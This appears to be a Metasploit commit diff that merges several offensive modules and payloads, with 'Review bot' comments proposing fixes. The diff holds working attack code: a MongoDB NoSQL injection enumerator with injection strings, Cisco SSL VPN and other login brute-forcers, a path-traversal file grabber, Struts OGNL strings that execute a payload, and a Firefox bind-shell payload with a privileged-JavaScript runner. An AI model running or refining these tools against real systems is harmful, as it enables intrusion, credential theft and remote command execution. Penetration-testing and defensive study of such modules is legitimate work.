Merge branch 'master' into staging/electro-release

bug/bundler_fix
David Maloney 2014-06-12 14:02:27 -05:00
commit 96e492f572
No known key found for this signature in database
GPG Key ID: DEDBA9DC3A913DB2
28 changed files with 758 additions and 124 deletions


@ -10,7 +10,7 @@
height: 480px;
width: 640px;
border-radius: 15px;
-moz-border-raidus: 15px;
-moz-border-radius: 15px;
background-color: black;
position: absolute;
left: 50;
@ -26,7 +26,7 @@
height: 180px;
width: 200px;
border-radius: 15px;
-moz-border-raidus: 15px;
-moz-border-radius: 15px;
background-color: #9B9B9B;
position: absolute;
top: 480;
@ -66,8 +66,9 @@
left: 10;
}
</style>
<script src="=WEBRTCAPIJS="> </script>
<script>
=WEBRTCAPIJS=
window.onerror = function(e) {
document.getElementById("message").innerHTML = "Error: " + e.toString();
}
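Review bot: Inlining the library through the `=WEBRTCAPIJS=` placeholder in the third hunk makes the whole `<script>` element one parse unit, so a bad substitution (placeholder left in place, or substituted source that happens to contain a `</script>` sequence) takes the `window.onerror` handler defined right after it down with the library, and the page then has no error reporting at all. Keeping the handler in its own element ahead of the inlined code keeps it alive independently, `<script>window.onerror = function(e) { ... }</script>` followed by `<script>=WEBRTCAPIJS=</script>`. The handler also writes the error text via innerHTML; `textContent` would show it without interpreting any markup it contains.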


@ -2,6 +2,10 @@
<head>
<title>Video session</title>
<style type="text/css">
body {
background: #fff;
}
div.dot1 {
position: absolute;
width: 20px;
@ -84,8 +88,9 @@
}
</style>
<script src="api.js"> </script>
<script>
=WEBRTCAPIJS=
var channel = '=CHANNEL=';
var websocket = new WebSocket('ws://=SERVER=');
@ -136,10 +141,12 @@
};
window.onload = function() {
getUserMedia(function(stream) {
peer.addStream(stream);
peer.startBroadcasting();
});
setTimeout(function(){
getUserMedia(function(stream) {
peer.addStream(stream);
peer.startBroadcasting();
});
}, 500);
};
function getUserMedia(callback) {
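Review bot: The 500 ms delay wrapped around getUserMedia in the last hunk is an unexplained magic number; a reader cannot tell what it waits for or why the previous immediate call was wrong. Add a why-comment on the `setTimeout` line, e.g. `// presumably lets the WebSocket/peer setup above settle before broadcasting — confirm`, or name the constant. If the delay papers over the websocket not being open yet, an `onopen` callback on the socket created at the top of the page would be the deterministic alternative. getUserMedia's body continues outside the hunk.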


@ -14,10 +14,11 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
# privileged javascript context
# @return [String] the results that were sent back. This can be achieved through
# calling the "send" function, or by just returning the value in +js+
def js_exec(js)
def js_exec(js, timeout=30)
print_status "Running the privileged javascript..."
session.shell_write("[JAVASCRIPT]#{js}[/JAVASCRIPT]")
session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
token = "[[#{Rex::Text.rand_text_alpha(8)}]]"
session.shell_write("#{token}[JAVASCRIPT]#{js}[/JAVASCRIPT]#{token}")
session.shell_read_until_token("[!JAVASCRIPT]", 0, timeout)
end
# Puts the shellcode into memory, adds X flag, and calls it
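Review bot: The new `timeout` parameter of js_exec is undocumented while the YARD block above still describes only `js` and the return value. Add `# @param timeout [Integer] seconds that shell_read_until_token waits for the [!JAVASCRIPT] terminator before giving up` under the existing tags. Callers that previously relied on `datastore['TIMEOUT']` now get the fixed 30-second default unless they pass a value, which the description should state as well. The enclosing module continues outside the hunk.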


@ -16,6 +16,37 @@ module Msf::Payload::Firefox
|
end
# Javascript source of readUntilToken(s)
# Continues reading the stream as data is available, until a pair of
# command tokens like [[aBcD123ffh]] [[aBcD123ffh]] is consumed.
#
# Returns a function that can be passed to the #onDataAvailable callback of
# nsIInputStreamPump that will buffer until a second token is read, or, in
# the absence of any tokens, a newline character is read.
#
# @return [String] javascript source code that exposes the readUntilToken(cb) function
def read_until_token_source
%Q|
var readUntilToken = function(cb) {
Components.utils.import("resource://gre/modules/NetUtil.jsm");
var buffer = '', m = null;
return function(request, context, stream, offset, count) {
buffer += NetUtil.readInputStreamToString(stream, count);
if (buffer.match(/^(\\[\\[\\w{8}\\]\\])/)) {
if (m = buffer.match(/^(\\[\\[\\w{8}\\]\\])([\\s\\S]*)\\1/)) {
cb(m[2]);
buffer = '';
}
} else if (buffer.indexOf("\\n") > -1) {
cb(buffer);
buffer = '';
}
};
};
|
end
# Javascript source code of readFile(path) - synchronously reads a file and returns
# its contents. The file is deleted immediately afterwards.
#
@ -189,4 +220,5 @@ module Msf::Payload::Firefox
(new ActiveXObject("WScript.Shell")).Run(cmd, 0, true);
|
end
end
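Review bot: In read_until_token_source, once the closing token has matched the buffer is reset to the empty string, so any bytes that arrived in the same chunk after the second token (the start of the next command) are silently dropped. Keeping the unconsumed tail instead, `buffer = buffer.slice(m[0].length);`, lets the next onDataAvailable call pick it up. Note also that neither branch bounds the buffer: a peer that never sends the closing token or a newline makes `buffer` grow without limit, so a maximum size after which the buffer is discarded would be a cheap safeguard. The second hunk of this section is only the module's closing `end`.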


@ -9,6 +9,7 @@ class Msf::Post < Msf::Module
require 'msf/core/post_mixin'
require 'msf/core/post/file'
require 'msf/core/post/webrtc'
require 'msf/core/post/linux'
require 'msf/core/post/osx'


@ -0,0 +1,57 @@
# -*- coding: binary -*-
module Msf::Post::WebRTC
#
# Connects to a video chat session as an answerer
#
# @param offerer_id [String] The offerer's ID in order to join the video chat
# @return void
#
def connect_video_chat(server, channel, offerer_id)
interface = load_interface('answerer.html')
interface.gsub!(/\=SERVER\=/, server)
interface.gsub!(/\=RHOST\=/, rhost)
interface.gsub!(/\=CHANNEL\=/, channel)
interface.gsub!(/\=OFFERERID\=/, offerer_id)
tmp_interface = Tempfile.new(['answerer', '.html'])
tmp_interface.binmode
tmp_interface.write(interface)
tmp_interface.close
found_local_browser = Rex::Compat.open_webrtc_browser(tmp_interface.path)
unless found_local_browser
raise RuntimeError, "Unable to find a suitable browser to connect to the target"
end
end
#
# Returns the webcam interface
#
# @param html_name [String] The filename of the HTML interface (offerer.html or answerer.html)
# @return [String] The HTML interface code
#
def load_interface(html_name)
interface_path = ::File.join(Msf::Config.data_directory, 'webcam', html_name)
interface_code = ''
::File.open(interface_path) { |f| interface_code = f.read }
interface_code.gsub!(/\=WEBRTCAPIJS\=/, load_api_code)
interface_code
end
#
# Returns the webcam API
#
# @return [String] The WebRTC lib code
#
def load_api_code
js_api_path = ::File.join(Msf::Config.data_directory, 'webcam', 'api.js')
api = ''
::File.open(js_api_path) { |f| api = f.read }
api
end
end
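Review bot: `load_interface` substitutes the whole api.js source with `gsub!` in string-replacement form, where backslash sequences such as `\\1`, `\\0` or `\\\\` in the replacement are interpreted as back-references instead of being copied literally, so a JavaScript file containing escapes would be altered on insertion. Use the block form, which inserts the text verbatim: `interface_code.gsub!(/\=WEBRTCAPIJS\=/) { load_api_code }`; the same applies to the `server` value substituted in connect_video_chat. connect_video_chat documents only `offerer_id`, so `server` and `channel` need `@param` tags, and the Tempfile holding the filled-in interface is closed but never unlinked, leaving the channel and offerer identifiers on disk until the process exits. `Tempfile` also needs `require 'tempfile'` unless the framework loads it already.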


@ -18,6 +18,7 @@ class Webcam
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::WebRTC
def initialize(client)
@client = client
@ -195,66 +196,6 @@ class Webcam
end
end
#
# Connects to a video chat session as an answerer
#
# @param offerer_id [String] The offerer's ID in order to join the video chat
# @return void
#
def connect_video_chat(server, channel, offerer_id)
interface = load_interface('answerer.html')
api = load_api_code
tmp_api = Tempfile.new('api.js')
tmp_api.binmode
tmp_api.write(api)
tmp_api.close
interface = interface.gsub(/\=SERVER\=/, server)
interface = interface.gsub(/\=WEBRTCAPIJS\=/, tmp_api.path)
interface = interface.gsub(/\=RHOST\=/, rhost)
interface = interface.gsub(/\=CHANNEL\=/, channel)
interface = interface.gsub(/\=OFFERERID\=/, offerer_id)
tmp_interface = Tempfile.new('answerer.html')
tmp_interface.binmode
tmp_interface.write(interface)
tmp_interface.close
found_local_browser = Rex::Compat.open_webrtc_browser(tmp_interface.path)
unless found_local_browser
raise RuntimeError, "Unable to find a suitable browser to connect to the target"
end
end
#
# Returns the webcam interface
#
# @param html_name [String] The filename of the HTML interface (offerer.html or answerer.html)
# @return [String] The HTML interface code
#
def load_interface(html_name)
interface_path = ::File.join(Msf::Config.data_directory, 'webcam', html_name)
interface_code = ''
::File.open(interface_path) { |f| interface_code = f.read }
interface_code
end
#
# Returns the webcam API
#
# @return [String] The WebRTC lib code
#
def load_api_code
js_api_path = ::File.join(Msf::Config.data_directory, 'webcam', 'api.js')
api = ''
::File.open(js_api_path) { |f| api = f.read }
api
end
end
end; end; end; end; end; end


@ -0,0 +1,91 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Chromecast YouTube Remote Control',
'Description' => %q{
This module acts as a simple remote control for Chromecast YouTube.
},
'Author' => ['wvu'],
'References' => [
['URL', 'https://en.wikipedia.org/wiki/Chromecast']
],
'License' => MSF_LICENSE,
'Actions' => [
['Play', 'Description' => 'Play video'],
['Stop', 'Description' => 'Stop video']
],
'DefaultAction' => 'Play'
))
register_options([
Opt::RPORT(8008),
OptString.new('VID', [true, 'Video ID', 'kxopViU98Xo'])
], self.class)
end
def run
vid = datastore['VID']
case action.name
when 'Play'
res = play(vid)
when 'Stop'
res = stop
end
return unless res
case res.code
when 201
print_good("Playing https://www.youtube.com/watch?v=#{vid}")
when 200
print_status("Stopping video")
when 404
print_error("Couldn't #{action.name.downcase} video")
end
end
def play(vid)
begin
send_request_cgi(
'method' => 'POST',
'uri' => '/apps/YouTube',
'agent' => Rex::Text.rand_text_english(rand(42) + 1),
'vars_post' => {
'v' => vid
}
)
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
Rex::HostUnreachable => e
fail_with(Failure::Unreachable, e)
ensure
disconnect
end
end
def stop
begin
send_request_raw(
'method' => 'DELETE',
'uri' => '/apps/YouTube',
'agent' => Rex::Text.rand_text_english(rand(42) + 1)
)
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
Rex::HostUnreachable => e
fail_with(Failure::Unreachable, e)
ensure
disconnect
end
end
end
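Review bot: `run` reports only the 201, 200 and 404 outcomes and says nothing when `send_request_cgi` returned nil or when any other status comes back, so a failed request ends the module silently. Add `print_error("No response from #{peer}")` ahead of the `return unless res` line and an `else print_error("Unexpected response code: #{res.code}")` branch to the `case res.code`. The `begin/rescue/ensure` that wraps the entire body of `play` and `stop` could be the method-level form, dropping one indentation level in both.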


@ -0,0 +1,150 @@
##
## This module requires Metasploit: http//metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => "MongoDB NoSQL Collection Enumeration Via Injection",
'Description' => %q{
This module can exploit NoSQL injections on MongoDB versions less than 2.4
and enumerate the collections available in the data via boolean injections.
},
'License' => MSF_LICENSE,
'Author' =>
['Brandon Perry <bperry.volatile@gmail.com>'],
'References' =>
[['URL', 'http://nosql.mypopescu.com/post/14453905385/attacking-nosql-and-node-js-server-side-javascript']],
'Platform' => ['linux', 'win'],
'Privileged' => false,
'DisclosureDate' => "Jun 7 2014"))
register_options(
[
OptString.new('TARGETURI', [ true, 'Full vulnerable URI with [NoSQLi] where the injection point is', '/index.php?age=50[NoSQLi]'])
], self.class)
end
def syntaxes
[["\"'||this||'", "'||[inject]||'"],
["\"';return+true;var+foo='", "';return+[inject];var+foo='"],
['\'"||this||"','"||[inject]||"'],
['\'";return+true;var+foo="', '";return+[inject];var+foo="'],
["||this","||[inject]"]]
end
def run
uri = datastore['TARGETURI']
res = send_request_cgi({
'uri' => uri.sub('[NoSQLi]', '')
})
if !res
fail_with("Server did not respond in an expected way.")
end
pay = ""
fals = res.body
tru = nil
syntaxes.each do |payload|
print_status("Testing " + payload[0])
res = send_request_cgi({
'uri' => uri.sub('[NoSQLi]', payload[0])
})
if res and res.body != fals and res.code == 200
print_status("Looks like " + payload[0] + " works")
tru = res.body
res = send_request_cgi({
'uri' => uri.sub('[NoSQLi]', payload[0].sub('true', 'false').sub('this', '!this'))
})
if res and res.body != tru and res.code == 200
vprint_status("I think I confirmed with a negative test.")
fals = res.body
pay = payload[1]
break
end
end
end
if pay == ''
fail_with("Couldn't detect a payload, maybe it isn't injectable.")
end
length = 0
vprint_status("Getting length of the number of collections.")
(0..100).each do |len|
str = "db.getCollectionNames().length==#{len}"
res = send_request_cgi({
'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
})
if res and res.body == tru
length = len
print_status("#{len} collections are available")
break
end
end
vprint_status("Getting collection names")
names = []
(0...length).each do |i|
vprint_status("Getting length of name for collection " + i.to_s)
name_len = 0
(0..100).each do |k|
str = "db.getCollectionNames()[#{i}].length==#{k}"
res = send_request_cgi({
'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
})
if res and res.body == tru
name_len = k
print_status("Length of collection #{i}'s name is #{k}")
break
end
end
vprint_status("Getting collection #{i}'s name")
name = ''
(0...name_len).each do |k|
[*('a'..'z'),*('0'..'9'),*('A'..'Z'),'.'].each do |c|
str = "db.getCollectionNames()[#{i}][#{k}]=='#{c}'"
res = send_request_cgi({
'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
})
if res and res.body == tru
name << c
break
end
end
end
print_status("Collections #{i}'s name is " + name)
names << name
end
p = store_loot("mongo_injection.#{datastore['RHOST']}_collections",
"text/plain",
nil,
names.to_json,
"mongo_injection_#{datastore['RHOST']}.txt",
"#{datastore["RHOST"]} MongoDB Javascript Injection Collection Enumeration")
print_good("Your collections are located at: " + p)
end
end
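Review bot: The per-character loop that rebuilds each collection name (the `(0...name_len).each` block) appends a character only when one of the candidates matched; when none does, the position is skipped without any message, so the printed name can be shorter than the length reported just before it and the user gets no hint that the result is incomplete. Track a `matched` flag in the inner loop and emit `vprint_warning("No match for position #{k} of collection #{i}")` when it stays false. The `if res and ...` conditions should use `&&`, and `print_status("Testing " + payload[0])` reads better as interpolation. `names.to_json` also relies on `require 'json'`, which this file does not do, unless the framework loads it.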


@ -0,0 +1,227 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'Cisco SSL VPN Bruteforce Login Utility',
'Description' => %{
This module scans for Cisco SSL VPN web login portals and
performs login brute force to identify valid credentials.
},
'Author' =>
[
'Jonathan Claudius <jclaudius[at]trustwave.com>'
],
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'SSL' => true,
'USERNAME' => 'cisco',
'PASSWORD' => 'cisco'
}
))
register_options(
[
Opt::RPORT(443),
OptString.new('GROUP', [false, "A specific VPN group to use", ''])
], self.class)
end
def run_host(ip)
unless check_conn?
vprint_error("#{peer} - Connection failed, Aborting...")
return false
end
unless is_app_ssl_vpn?
vprint_error("#{peer} - Application does not appear to be Cisco SSL VPN. Module will not continue.")
return false
end
vprint_good("#{peer} - Application appears to be Cisco SSL VPN. Module will continue.")
groups = Set.new
if datastore['GROUP'].empty?
vprint_status("#{peer} - Attempt to Enumerate VPN Groups...")
groups = enumerate_vpn_groups
if groups.empty?
vprint_warning("#{peer} - Unable to enumerate groups")
vprint_warning("#{peer} - Using the default group: DefaultWEBVPNGroup")
groups << "DefaultWEBVPNGroup"
else
vprint_good("#{peer} - Enumerated VPN Groups: #{groups.to_a.join(", ")}")
end
else
groups << datastore['GROUP']
end
groups << ""
vprint_status("#{peer} - Starting login brute force...")
groups.each do |group|
each_user_pass do |user, pass|
do_login(user, pass, group)
end
end
end
# Verify whether the connection is working or not
def check_conn?
begin
res = send_request_cgi('uri' => '/', 'method' => 'GET')
vprint_good("#{peer} - Server is responsive...")
rescue ::Rex::ConnectionRefused,
::Rex::HostUnreachable,
::Rex::ConnectionTimeout,
::Rex::ConnectionError,
::Errno::EPIPE
return
end
end
def enumerate_vpn_groups
res = send_request_cgi(
'uri' => '/+CSCOE+/logon.html',
'method' => 'GET',
)
if res &&
res.code == 302
res = send_request_cgi(
'uri' => '/+CSCOE+/logon.html',
'method' => 'GET',
'vars_get' => { 'fcadbadd' => "1" }
)
end
groups = Set.new
group_name_regex = /<select id="group_list" name="group_list" style="z-index:1(?:; float:left;)?" onchange="updateLogonForm\(this\.value,{(.*)}/
if res &&
match = res.body.match(group_name_regex)
group_string = match[1]
groups = group_string.scan(/'([\w\-0-9]+)'/).flatten.to_set
end
return groups
end
# Verify whether we're working with SSL VPN or not
def is_app_ssl_vpn?
res = send_request_cgi(
'uri' => '/+CSCOE+/logon.html',
'method' => 'GET',
)
if res &&
res.code == 302
res = send_request_cgi(
'uri' => '/+CSCOE+/logon.html',
'method' => 'GET',
'vars_get' => { 'fcadbadd' => "1" }
)
end
if res &&
res.code == 200 &&
res.body.match(/webvpnlogin/)
return true
else
return false
end
end
def do_logout(cookie)
res = send_request_cgi(
'uri' => '/+webvpn+/webvpn_logout.html',
'method' => 'GET',
'cookie' => cookie
)
end
# Brute-force the login page
def do_login(user, pass, group)
vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect} and group:#{group.inspect}")
begin
cookie = "webvpn=; " +
"webvpnc=; " +
"webvpn_portal=; " +
"webvpnSharePoint=; " +
"webvpnlogin=1; " +
"webvpnLang=en;"
post_params = {
'tgroup' => '',
'next' => '',
'tgcookieset' => '',
'username' => user,
'password' => pass,
'Login' => 'Logon'
}
post_params['group_list'] = group unless group.empty?
resp = send_request_cgi(
'uri' => '/+webvpn+/index.html',
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => cookie,
'vars_post' => post_params
)
if resp &&
resp.code == 200 &&
resp.body.match(/SSL VPN Service/) &&
resp.body.match(/webvpn_logout/i)
print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}")
do_logout(resp.get_cookies)
report_hash = {
:host => rhost,
:port => rport,
:sname => 'Cisco SSL VPN',
:user => user,
:pass => pass,
:group => group,
:active => true,
:type => 'password'
}
report_auth_info(report_hash)
return :next_user
else
vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}")
end
rescue ::Rex::ConnectionRefused,
::Rex::HostUnreachable,
::Rex::ConnectionTimeout,
::Rex::ConnectionError,
::Errno::EPIPE
vprint_error("#{peer} - HTTP Connection Failed, Aborting")
return :abort
end
end
end
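Review bot: `check_conn?` returns whatever `vprint_good` returns on the success path, which is not a connectivity signal (with VERBOSE off a vprint helper typically prints nothing and returns nil), so `run_host` may abort on a perfectly responsive host. Return an explicit boolean, e.g. `res ? true : false` after the vprint line, and drop the unused `res` assignment in `do_logout`. The `Set` constant used in `run_host` and `enumerate_vpn_groups` (and `to_set`) needs `require 'set'` unless the framework already loads it, and `is_app_ssl_vpn?` would follow Ruby naming as `app_ssl_vpn?`.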


@ -10,6 +10,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
@ -39,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
def get_sid_token
res = send_request_raw({
'method' => 'GET',
'uri' => normalize_uri(@uri.path)
'uri' => normalize_uri(@uri)
})
return [nil, nil] if res.nil? || res.get_cookies.empty?
@ -62,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
#
sid, token = get_sid_token
if sid.nil? or token.nil?
print_error("#{peer} - Unable to obtain session ID or token, cannot continue")
vprint_error("#{peer} - Unable to obtain session ID or token, cannot continue")
return :abort
else
vprint_status("#{peer} - Using sessiond ID: #{sid}")
@ -72,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri("#{@uri.path}index.php"),
'uri' => normalize_uri("#{@uri}index.php"),
'cookie' => sid,
'vars_post' => {
'token' => token,
@ -91,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
end
if res.nil?
print_error("#{peer} - Connection timed out")
vprint_error("#{peer} - Connection timed out")
return :abort
end
@ -116,8 +117,12 @@ class Metasploit3 < Msf::Auxiliary
def run
@uri = target_uri.path
@uri.path << "/" if @uri.path[-1, 1] != "/"
@uri << "/" if @uri[-1, 1] != "/"
super
end
def run_host(ip)
each_user_pass { |user, pass|
vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
do_login(user, pass)
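Review bot: In the last hunk, `@uri = target_uri.path` followed by `@uri << "/"` appends to the String object returned by `target_uri.path`; if that string is the URI object's own path, the mutation leaks into `target_uri` and into anything else that reads it later. Copying first avoids the aliasing: `@uri = target_uri.path.dup` (or build the value with `+` instead of `<<`). The print-to-vprint changes in the earlier hunks are consistent with the module now running under Msf::Auxiliary::Scanner; `sid.nil? or token.nil?` would be clearer with `||`. run_host's body continues outside the hunk.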


@ -10,6 +10,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
@ -55,11 +56,11 @@ class Metasploit3 < Msf::Auxiliary
})
if not res
print_error("#{peer} - Connection timed out")
vprint_error("#{peer} - Connection timed out")
return :abort
end
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED
print_error("#{peer} - Failed to response")
vprint_error("#{peer} - Failed to response")
return :abort
end
@ -79,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
def run_host(ip)
if anonymous_access?
print_status("#{peer} - No login necessary. Server allows anonymous access.")
return
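Review bot: The changed error message in the second hunk, `vprint_error("#{peer} - Failed to response")`, is ungrammatical; `"#{peer} - Failed to respond"` (or `"No response from #{peer}"`) is what a user will expect and grep for. The `if not res` guard above it is `unless res` in idiomatic Ruby. The `ip` parameter of the new `run_host(ip)` is unused, which is normal for the Scanner mixin's signature as long as the messages keep using `peer` as they do here. run_host's body continues outside the hunk.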


@ -8,6 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
@ -41,13 +42,13 @@ class Metasploit3 < Msf::Auxiliary
], self.class)
end
def run
def run_host(ip)
uri = target_uri.path
uri << '/' if uri[-1, 1] != '/'
t = "/.." * datastore['DEPTH']
print_status("Retrieving #{datastore['FILE']}")
vprint_status("#{peer} - Retrieving #{datastore['FILE']}")
# No permission to access.log or proc/self/environ, so this is all we do :-/
uri = normalize_uri(uri, 'index.php')
@ -57,13 +58,14 @@ class Metasploit3 < Msf::Auxiliary
})
if not res
print_error("Server timed out")
vprint_error("#{peer} - Server timed out")
elsif res and res.body =~ /Error 404 requested page cannot be found/
print_error("Either the file doesn't exist, or you don't have the permission to get it")
vprint_error("#{peer} - Either the file doesn't exist, or you don't have the permission to get it")
else
# We don't save the body by default, because there's also other junk in it.
# But we still have a SAVE option just in case
print_line(res.body)
print_good("#{peer} - #{datastore['FILE']} retrieved")
vprint_line(res.body)
if datastore['SAVE']
p = store_loot(
@ -73,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
res.body,
::File.basename(datastore['FILE'])
)
print_status("File saved as: #{p}")
print_good("#{peer} - File saved as: #{p}")
end
end
end
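Review bot: In the third hunk, the `elsif res and res.body =~ ...` branch re-tests `res` although the `if not res` branch directly above already handled the nil case, and `and` inside a condition should be `&&`; `elsif res.body =~ /Error 404 requested page cannot be found/` is enough. The success branch prints `retrieved` before anything checks that the body is non-empty, and with `vprint_line` the contents are now shown only under VERBOSE while SAVE is optional, so a non-verbose run without SAVE produces the success line and nothing else; the `print_good` text could mention that the body is displayed with VERBOSE or kept with SAVE.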


@ -10,14 +10,15 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'V-CMS Login Utility',
'Description' => %q{
This module attempts to authenticate to an English-based V-CMS login interface.
It should only work against version v1.1 or older, because these versions do not
have any default protections against bruteforcing.
This module attempts to authenticate to an English-based V-CMS login interface. It
should only work against version v1.1 or older, because these versions do not have
any default protections against bruteforcing.
},
'Author' => [ 'sinn3r' ],
'License' => MSF_LICENSE
@ -31,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt") ]),
OptString.new('TARGETURI', [true, 'The URI path to dolibarr', '/vcms2/'])
OptString.new('TARGETURI', [true, 'The URI path to V-CMS', '/vcms2/'])
], self.class)
end
@ -39,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
def get_sid
res = send_request_raw({
'method' => 'GET',
'uri' => @uri.path
'uri' => @uri
})
# Get the PHP session ID
@ -52,6 +53,11 @@ class Metasploit3 < Msf::Auxiliary
def do_login(user, pass)
begin
sid = get_sid
if sid.nil?
vprint_error("#{peer} - Failed to get sid")
return :abort
end
res = send_request_cgi({
'uri' => "#{@uri}process.php",
'method' => 'POST',
@ -62,9 +68,7 @@ class Metasploit3 < Msf::Auxiliary
'sublogin' => '1'
}
})
location = res.headers['Location']
res = send_request_cgi({
'uri' => location,
'method' => 'GET',
@ -87,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
return :skip_user
when /Invalid password/
vprint_status("#{peer} - Username found: #{user}")
else /\<a href="process\.php\?logout=1"\>/
when /\<a href="process\.php\?logout=1"\>/
print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
report_auth_info({
:host => rhost,
@ -107,8 +111,12 @@ class Metasploit3 < Msf::Auxiliary
def run
@uri = normalize_uri(target_uri.path)
@uri.path << "/" if @uri.path[-1, 1] != "/"
@uri << "/" if @uri[-1, 1] != "/"
super
end
def run_host(ip)
each_user_pass { |user, pass|
vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
do_login(user, pass)
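Review bot: The new `sid.nil?` guard in the `@ -52,6 +53,11` hunk covers the session lookup, but the POST right after it can also return nil on a timeout, and the following `location = res.headers['Location']` (context in the next hunk) would then raise NoMethodError; add `return :abort unless res` (with a vprint_error) between that request and the `location` line. do_login's rescue clause lies outside these hunks, so whether NoMethodError is caught there cannot be seen here. The `else /regex/` → `when /regex/` change in the fourth hunk is a real fix: before it, the regex on the `else` line was a dead expression and the branch ran for every non-matching response. do_login's body continues outside the hunks.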


@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
['Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'windows'
'Platform' => 'win'
}
],
['Linux Universal',
@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote
exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
when 'windows'
when 'win'
path = temp_path || './'
payload_exe = "#{path}#{payload_exe}.exe"
exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{payload_exe}')"


@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
when 'windows'
when 'win'
@payload_exe = "./#{@payload_exe}.exe"
exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')"
else


@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Local
'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>',
'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
],
'Platform' => [ 'windows' ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [ [ 'Windows', {} ] ],
'DisclosureDate' => 'Jan 2 2013', # Date of scriptjunkie's blog post


@ -6,6 +6,7 @@
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
@ -23,22 +24,14 @@ module Metasploit3
'Arch' => ARCH_FIREFOX,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'firefox',
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
'PayloadType' => 'firefox'
))
end
#
# Constructs the payload
#
def generate
super + command_string
end
#
# Returns the JS string to use for execution
#
def command_string
def generate
%Q|
(function(){
Components.utils.import("resource://gre/modules/NetUtil.jsm");
@ -59,16 +52,17 @@ module Metasploit3
}
};
#{read_until_token_source}
var clientListener = function(outStream) {
return {
onStartRequest: function(request, context) {},
onStopRequest: function(request, context) {},
onDataAvailable: function(request, context, stream, offset, count) {
var data = NetUtil.readInputStreamToString(stream, count).trim();
onDataAvailable: readUntilToken(function(data) {
runCmd(data, function(err, output) {
if(!err) outStream.write(output, output.length);
});
}
})
};
};
